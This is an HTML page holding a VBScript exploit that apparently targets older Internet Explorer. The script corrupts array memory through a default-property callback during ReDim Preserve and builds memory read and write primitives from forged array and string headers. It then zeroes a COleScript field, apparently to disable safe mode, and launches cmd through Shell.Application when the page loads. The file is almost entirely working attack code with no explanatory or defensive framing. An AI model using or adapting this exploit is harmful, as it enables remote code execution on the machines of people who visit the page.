beforeIE9.html

<html>
<body>
	<title>test</title>
    <script type="text/vbscript">
	
	Dim max_col
	Dim index_vul
	Dim index_a
	Dim index_b
	Dim addr
	Dim array()
	Dim array2(0,6)
	Dim util_mem
	Dim fake_array
	Dim fake_str
	Class Dummy
        End Class
	Class MyClass
		private Sub Class_Initialize
			ReDim array(2)
			'IsEmpty(array)
		End Sub
		Public Default Property Get P
			ReDim Preserve array(100000)
			For i = 0 To UBound(array2,2)
                	array2(0,i) = 3
            		Next
			For i = 0 To UBound(array)
                	array(i) = array2
            		Next
		P=&h0fffffff
		End Property
	End Class
	Function rw_primit()
		array(index_vul)(index_a+2,0)=fake_array
		array(index_b)(0,2)=CDbl("1.74088534731324E-310")
		array(index_vul)(index_a,0)=fake_str
		array(index_b)(0,0)=CDbl("6.36598737437801E-314")
		util_mem=array(index_vul)(index_a,0)
	End Function
	
	Function read
		read=LenB(array(index_vul)(index_a+2,0)(util_mem+8))
	End Function
	Function GetUnit32(addr)
		Dim value
		array(index_vul)(index_a+2,0)(util_mem+8)=addr +4
		array(index_vul)(index_a+2,0)(util_mem)=8
		value=read()
		array(index_vul)(index_a+2,0)(util_mem)=3
		GetUnit32 = value
	End Function
	Set cls = New MyClass
	array(2)=cls
	IsEmpty(array)
	
	max_col=&h0fffffff
	
	
	For i=0 To UBound(array)
		If UBound(array(i),1)-LBound(array(i),1)+1=max_col Then
			index_vul=i
			Exit For
		End If
	Next
	
	
	For i=0 To UBound(array(index_vul),1)
		Dim type1 ,type2 ,type3 ,type4
		type1=VarType(array(index_vul)(i,0))
		type2=VarType(array(index_vul)(i+1,0))
		type3=VarType(array(index_vul)(i+3,0))
		type4=VarType(array(index_vul)(i+4,0))
		If(type1 = 2 And type2 = 2 And type3 = 3 And type4 = 3) Then
			index_a=i+3
			array(index_vul)(index_a,0)="AAAA"
			Exit For
		End If
	Next
	
	For i=0 To UBound(array,1)
		If array(i)(0,0)=8 Then
			index_b=i
			Exit For
		End If
	next
	
	Set dm = New Dummy
	Set array(index_vul)(index_a+4,0) = dm
	array(index_b)(0,4) = CDbl("6.36598737437801E-314") '3
	addr=array(index_vul)(index_a+4,0)
	
	fake_array=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
	fake_str=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
	rw_primit()
	
	Dim psection
	psection = GetUnit32(addr+&hc)
	dim a
	a=psection+4
	Dim p_COleScript
	p_COleScript=GetUnit32(a)
	a=p_COleScript+&h174
	
	array(index_vul)(index_a+2,0)(a-8)=0
	
	Set Object = CreateObject("Shell.Application")
        Object.ShellExecute "cmd"
    </script>
</body>
</html>